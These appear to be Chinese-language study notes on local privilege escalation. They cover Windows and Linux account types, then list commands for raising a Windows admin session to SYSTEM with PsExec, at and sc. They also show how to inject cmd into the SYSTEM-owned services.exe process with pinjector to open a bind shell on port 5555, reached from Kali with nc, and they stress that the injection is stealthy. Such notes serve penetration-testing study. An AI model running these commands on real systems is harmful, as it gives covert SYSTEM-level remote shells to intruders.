本地提权
系统账号之间的权限隔离
操作系统安全的基础
用户空间、内核空间
系统账号
用户账号登陆时获取权限令牌
服务账号无需用户登陆已在后台启动服务
windows的账户有user(平时创建的账户类型)、Administrator 管理员、system系统账户
linux的账户有user(同上)、root(等同于Windows的admin+system)
windows
admin提权为system:
sysinternal suite:使用sysinternal suite中的PsExec工具,cmd在工具exe所在目录psexec -i -s -d cmd即可调出system权限的cmd
at命令:at 19:39 /interactive cmd (XP可用 以上系统不可用)
sc命令:sc create syscmd binPath= ”cmd /k start” type= own type= interact
sc start syscmd(此方法win7使用有安全提示 需要在图形界面操作 也等于不可用)
注入进程提权:
使用pinjector.exe,将cmd注入到现有的进程里,注入的进程是什么账户的,就会获得什么账户
pinjector.exe -p 656 cmd 5555 将cmd注入到PID是656的进程里(此时656是SYSTEM账户的services.exe服务),并开放侦听5555端口,随后在kali直接nc -nv [IP] 5555 就可以获得到windows的shell并且是SYSTEM账户权限
注入进程很隐蔽,不会多出一个进程,